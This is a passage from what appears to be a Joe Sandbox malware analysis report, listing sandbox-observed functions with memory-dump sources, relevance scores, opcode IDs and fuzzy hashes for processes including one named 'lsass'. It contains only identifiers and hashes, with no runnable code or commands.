                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 970184ef5f453681c824ba3ee8f1bfc658b3069047c65a3a19f2bf84c4be51f5
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 20C02B30F0E01C40E7A4473048510FA32014F43304F0D41F1810AF7082CC3C18003120

                                                            Non-executed Functions

                                                            Function 00007FFD348A09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction ID: 1aa783e87f7f83d51ef045af4f10062e2c7bb6e07b19927c41d851be2c32a240
                                                            • Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction Fuzzy Hash: 54418F07B0956267E12137FD75711EEABA88F82379B0C5677E24CDA0C3ACB8748582E5

                                                            Executed Functions

                                                            Function 00007FFD348C0E06 Relevance: 1.9, Instructions: 1874COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c64870ef15df3a6cd3f7326c8a23e350cca7b3a7f2143c49bd60dd7b155c7a5
                                                            • Instruction ID: 28f87d918803ee8ab72bff23ed4c7c42bc88a1cef1a5b3135657ca7970b9e6cf
                                                            • Opcode Fuzzy Hash: 7c64870ef15df3a6cd3f7326c8a23e350cca7b3a7f2143c49bd60dd7b155c7a5
                                                            • Instruction Fuzzy Hash: E5D27521F1891A4FEB98EB5884E16B9B3D2FF95340F1445BAD14ED32C6DE38BC419B81
                                                            Function 00007FFD348B0D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 09059784e03ee14807c6f4afd8f533139c3af8264f422416c005085798ef4b84
                                                            • Instruction ID: 697fcc07b8c94ac75a2ea8ee10b69b0226e5cc958ff72305d48caa086358f2b8
                                                            • Opcode Fuzzy Hash: 09059784e03ee14807c6f4afd8f533139c3af8264f422416c005085798ef4b84
                                                            • Instruction Fuzzy Hash: 3991D2B5A1DA8D8FE799DB5888B63A97FE1FB56310F4401BAC04AD72D2CEB92401D340
                                                            Function 00007FFD348C1A7E Relevance: 1.3, Instructions: 1279COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cfd2fd14ab6f363eff04911274041bf7496cc66058162cd030172012c78e943
                                                            • Instruction ID: 631c9c0e310bba3254ccf7be6e4231c643f4ca7fd0cf383c10ba7ae8461bd38d
                                                            • Opcode Fuzzy Hash: 3cfd2fd14ab6f363eff04911274041bf7496cc66058162cd030172012c78e943
                                                            • Instruction Fuzzy Hash: DC927421F1895A4FEB98EB5884E26B4B3D1FF95340F1445BAD14ED32C6DE38BC819B81
                                                            Function 00007FFD348C14A9 Relevance: 1.0, Instructions: 1039COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47b2d108708ebc17e0b9829b3c59322053929b6d6bb72307fe1ed0c393451f1a
                                                            • Instruction ID: 75f5b337f0b3ea3192b6b18b5d9262fe42f425f905c86edccd722c6bb72620e8
                                                            • Opcode Fuzzy Hash: 47b2d108708ebc17e0b9829b3c59322053929b6d6bb72307fe1ed0c393451f1a
                                                            • Instruction Fuzzy Hash: B9728421F1891A4FEB98EB1884E17B8B3D2FF95340F1445BAD14ED72D6DE38AC419B81
                                                            Function 00007FFD348C13FD Relevance: 1.0, Instructions: 1009COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f8e00615e00678d7c755a22e2807a8f734119a1b8718f24252461b23533f8ad
                                                            • Instruction ID: 5159de5c7e5a39f9c439b4aaea145ad145ef8f187351391ee34778aabf963511
                                                            • Opcode Fuzzy Hash: 4f8e00615e00678d7c755a22e2807a8f734119a1b8718f24252461b23533f8ad
                                                            • Instruction Fuzzy Hash: 36729421F1891A4FEB98EB5884E17B8B3E2FF95310F1441BAD14DD72D6DE38AC419B81
                                                            Function 00007FFD348C12F4 Relevance: 1.0, Instructions: 956COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32d5cb88b845be199fa3e16ba9be4afb8d7e9bab08d2cf7d26562c8042e6f801
                                                            • Instruction ID: b06014d5f24d708eebccb0274c1bd9e30dc11980cbe539330101600c37c9439f
                                                            • Opcode Fuzzy Hash: 32d5cb88b845be199fa3e16ba9be4afb8d7e9bab08d2cf7d26562c8042e6f801
                                                            • Instruction Fuzzy Hash: B4628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Function 00007FFD348C1338 Relevance: 1.0, Instructions: 956COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a722501793d7e4247ef57480532a0ceb824336db65a05dfbce47b9bce5161388
                                                            • Instruction ID: 666120b5a734683f93ebf844c51ca696842e9d6a9b19413691d223a25e81abb1
                                                            • Opcode Fuzzy Hash: a722501793d7e4247ef57480532a0ceb824336db65a05dfbce47b9bce5161388
                                                            • Instruction Fuzzy Hash: B2628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Function 00007FFD348C137C Relevance: 1.0, Instructions: 956COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af65cf519be62a5f5063365fb3b845053435e96b7ed103e203f88bb9e6b2a58d
                                                            • Instruction ID: 5ff5c09fd4d3bf15a5fd5804028de5fe456cf3abaf3d8bec375096a33475f33d
                                                            • Opcode Fuzzy Hash: af65cf519be62a5f5063365fb3b845053435e96b7ed103e203f88bb9e6b2a58d
                                                            • Instruction Fuzzy Hash: 77628421F1891A4FEB98EB5884E17B8B3D1FF95310F1441BAD14DD72D6DE38AC419B81
                                                            Function 00007FFD348C13C0 Relevance: 1.0, Instructions: 956COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d135137a5d60c4484679fb1e648cf4e78f647f45e1674dfbdd7dfaadda4e2d5f
                                                            • Instruction ID: 9e7c990d68688f28b910f300e8f7797939eb0c7b7febf3f4b6ac0fe329c60562
                                                            • Opcode Fuzzy Hash: d135137a5d60c4484679fb1e648cf4e78f647f45e1674dfbdd7dfaadda4e2d5f
                                                            • Instruction Fuzzy Hash: 14628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Function 00007FFD348E1000 Relevance: .4, Instructions: 396COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc3ff3722badeb49b73b37a51b73a3a9cd488ace656a983b1729ddfa83c92cc1
                                                            • Instruction ID: 2536bca4a501102daa55777f83d9d08765ebe008f9e2fdc50f49174eebdf5a28
                                                            • Opcode Fuzzy Hash: fc3ff3722badeb49b73b37a51b73a3a9cd488ace656a983b1729ddfa83c92cc1
                                                            • Instruction Fuzzy Hash: E1B15B21A6C65A06E31D961C48E20B6B3D2EB93706B2C537DCEE7C748BDD1C685396C1
                                                            Function 00007FFD348B07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536
                                                            • Opcode ID: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction ID: 7470b4312726b0e37fc381a5c3c137eee02d1f7244ea50c529dd3a121b239b27
                                                            • Opcode Fuzzy Hash: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction Fuzzy Hash: D7313421A0E7890FE7569B3888B51A93BB0EF87200F0941F7D549C71E3DD2C69068791
                                                            Function 00007FFD348EDA02 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-2852464175
                                                            • Opcode ID: 997eb4eadc75ca4402e84a6117cc64fe3378499df29ed88657d8c185ecda5de2
                                                            • Instruction ID: 0277d7de51f117381d57f63ad06405c83fd80419f5de7333bd5f83b1fce95abb
                                                            • Opcode Fuzzy Hash: 997eb4eadc75ca4402e84a6117cc64fe3378499df29ed88657d8c185ecda5de2
                                                            • Instruction Fuzzy Hash: 78015E71F0851A8BEB58D75498A43FE37E2EFD6304F188034D509D7185DE3E6AC6A740
                                                            Function 00007FFD348D5D49 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 715c48e77f8c6ebee8fc61a1de9f4722bb0a82c83da788da50ed4e075ba74d23
                                                            • Instruction ID: 29fa786b810987046f0d547e4a729bc9dcfa107cede82721b2caedfa0f3a6d73
                                                            • Opcode Fuzzy Hash: 715c48e77f8c6ebee8fc61a1de9f4722bb0a82c83da788da50ed4e075ba74d23
                                                            • Instruction Fuzzy Hash: 0BF0A061A0F7854FCB669A3488694587FA0EF67200B8A42EEC046CF5A3EE2C8846C701
                                                            Function 00007FFD348D97C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction ID: b36cfade61e7417599e45e2cb2920733ffef69a94b617dc15dfc5941e8329226
                                                            • Opcode Fuzzy Hash: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction Fuzzy Hash: 8AE01A7164F7C08FCB06EB7488798447FA0AE6721078B41EEC146CF1B3E62D8849C701
                                                            Function 00007FFD348EAD19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 6d6a752976c10b68381c7e48794814221d410325e36f782a6cc19096da1fce99
                                                            • Instruction ID: 01646989f3206e1461498404045fba049be280d30bc556787299b28557f5f4c0
                                                            • Opcode Fuzzy Hash: 6d6a752976c10b68381c7e48794814221d410325e36f782a6cc19096da1fce99
                                                            • Instruction Fuzzy Hash: DBE0E56154E7D44FCB0AAB3488698457FA0AE6B21178A40EEC149CB1A3E66D8849C701
                                                            Function 00007FFD348D9801 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5df4cf8b21d7fc3c6b9cee562d0e4c229f2f3121b8a084059e5a760c46a526f
                                                            • Instruction ID: bd6e0654f7cb8bd952af39f22d5ae811da4aec03ee51cdb5040f0ccc134214ab
                                                            • Opcode Fuzzy Hash: f5df4cf8b21d7fc3c6b9cee562d0e4c229f2f3121b8a084059e5a760c46a526f
                                                            • Instruction Fuzzy Hash: 9181D371B1E90A4FDB94EB68C4A56A977E1FF59310F50027AD10ED7292DF38A842DB80
                                                            Function 00007FFD348B0858 Relevance: .2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2e79bb2a193e63176991c97fb0b38664798006ea1e1daa5b7c6c4896b78eb98
                                                            • Instruction ID: 3bef1213ebd980830f904282587f96f37306fd00a1aadbba36b6a8ea565943fa
                                                            • Opcode Fuzzy Hash: c2e79bb2a193e63176991c97fb0b38664798006ea1e1daa5b7c6c4896b78eb98
                                                            • Instruction Fuzzy Hash: A1619570608A4D8FEB58EF18C8967F93BE1FF59311F00416AE85DC7692DE78E8458B81
                                                            Function 00007FFD348B08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ba3770b3ad667710a62f3f1bf424e12dc69f50a569cf200ec5a07c403691a8c
                                                            • Instruction ID: 418b14535111ccb18a8b0c2f6d6f608738822c97a16e8ea48878da5d1e257e1e
                                                            • Opcode Fuzzy Hash: 0ba3770b3ad667710a62f3f1bf424e12dc69f50a569cf200ec5a07c403691a8c
                                                            • Instruction Fuzzy Hash: 0341F222B0C5691FE714B7FCA4BA2FE7791DF86321B0805BBD54DC7193DD68A84182C4
                                                            Function 00007FFD348EAEB4 Relevance: .2, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d828453ab47baafff7688b4ef675afc743a414bfc7234ecc68b8c7477fd06068
                                                            • Instruction ID: 2eade0ce2d692b7371f73eb29d7af6a68968d86c698b062770f9a61c43838428
                                                            • Opcode Fuzzy Hash: d828453ab47baafff7688b4ef675afc743a414bfc7234ecc68b8c7477fd06068
                                                            • Instruction Fuzzy Hash: 1B41C561F0D90A4FEB98DB5C94F56F973D1EF95750F0801BAD50DD7282CE2CA8869780
                                                            Function 00007FFD348B090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e91aeb41a854c0e391bf286268ac55d6c60086822bc58c50e8aac7f1d02f3444
                                                            • Instruction ID: 9c35c5eb4354ffee8bfa4451814cbd1f6db82d97448c067d4931b07d4741d71d
                                                            • Opcode Fuzzy Hash: e91aeb41a854c0e391bf286268ac55d6c60086822bc58c50e8aac7f1d02f3444
                                                            • Instruction Fuzzy Hash: A9412422B0C5291FE714B7FCA4BA2F97791DF86321B08047BE14DC7193DDA8B84182C4
                                                            Function 00007FFD348B0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: e9a9dbf1134489ff64ed3cba917a8358e1fcd4671c08e58730990ba5daa9f485
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 7321913130C9184FE768EA1CE88ADB977D1EF9A32171501BAE58AC7126E955EC8287C1
                                                            Function 00007FFD348B4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction ID: 7576e503df4d863be61114b351e301bd5f2f669ca10a6d89107f0f71a574b2be
                                                            • Opcode Fuzzy Hash: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction Fuzzy Hash: 4E310120F0C91A4FEB94EB2884B67B86291FF5B740F5041B5D64ED7296DEACAC40A781
                                                            Function 00007FFD348B116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c49838792bc16148744faf695a7655e46f601b4a0c4d1fc2cebe48be8f885e6e
                                                            • Instruction ID: 43aa586c3f3487e6c281875c79296e318127b077827b44a1b00d64a07509404a
                                                            • Opcode Fuzzy Hash: c49838792bc16148744faf695a7655e46f601b4a0c4d1fc2cebe48be8f885e6e
                                                            • Instruction Fuzzy Hash: 6031B631A0C54A8FDB45EB64C8A59BD77F0FF5A300F0545BAC00ADB293DE79A941CB80
                                                            Function 00007FFD348B0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6052687e74018d3a7d4bfc0e942a55cb10d526571d95bcc371a613186694db4b
                                                            • Instruction ID: be5ca8baaed752b3fc4a17927c324f57be1e7183b4e9ef6988fa112c0ffc9963
                                                            • Opcode Fuzzy Hash: 6052687e74018d3a7d4bfc0e942a55cb10d526571d95bcc371a613186694db4b
                                                            • Instruction Fuzzy Hash: 9421F920B1C9290FF798A76C94EA6B976C2EB9A351B540079E50EC33D2DDACAC4182C1
                                                            Function 00007FFD348B0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction ID: d096ccad5cc86478fd04227944588ddc4db47be91ce7d6d8977c420fe186064d
                                                            • Opcode Fuzzy Hash: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction Fuzzy Hash: 2A21B136B0D6899FE712ABA898B10ED7B60EF43320F1442B2D148DB183EE7C654696C1
                                                            Function 00007FFD348EC0B1 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff5226bf4294a1d22a55a8f3270c98a1a3cbacbb02a99853db445e50a74f6a20
                                                            • Instruction ID: 070a058f86c4cf41120f687f6f2660eb0b8ac9c1a8ad530618294fb759124851
                                                            • Opcode Fuzzy Hash: ff5226bf4294a1d22a55a8f3270c98a1a3cbacbb02a99853db445e50a74f6a20
                                                            • Instruction Fuzzy Hash: 07115E22E0D6494FD729A76448AB5FA7FA0FF57320F4C01BBE50CC7083D91D68858381
                                                            Function 00007FFD348E2339 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23629de8a8c303f27782ea4d29641db831251725b0798490bfc3c079720b38e4
                                                            • Instruction ID: fa7d008d02189d185eaf5ea22176c23c86f8b6952f6103e8254e65c9421dffd4
                                                            • Opcode Fuzzy Hash: 23629de8a8c303f27782ea4d29641db831251725b0798490bfc3c079720b38e4
                                                            • Instruction Fuzzy Hash: 65119032F0C91A8FE768EB18C4A26B97391FB56350F084679D44DD72C6CE2C7C819B81
                                                            Function 00007FFD348B0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction ID: 3156e41ba4909368740d6bee8e92eb440faad0ac713325e6336dc9b8cd247d97
                                                            • Opcode Fuzzy Hash: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction Fuzzy Hash: 80119E35B0E68D8EE7139B6888B11AD7BA0EF53310F1545B6C144DB192DE7C660697C1
                                                            Function 00007FFD348B5721 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c840da4b69f6d5accff70d305ec01792d2597106b418932053a67a69883a648
                                                            • Instruction ID: 8786c4d0a7c54934fabc3884928ba8c8b2579c4af4205a6ecc7f00971f3d5c33
                                                            • Opcode Fuzzy Hash: 9c840da4b69f6d5accff70d305ec01792d2597106b418932053a67a69883a648
                                                            • Instruction Fuzzy Hash: FE110D71B08A09CFDB94DB44C494BAD77F2EB58314F15416AC40ED7290CF79A981DB48
                                                            Function 00007FFD348B0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
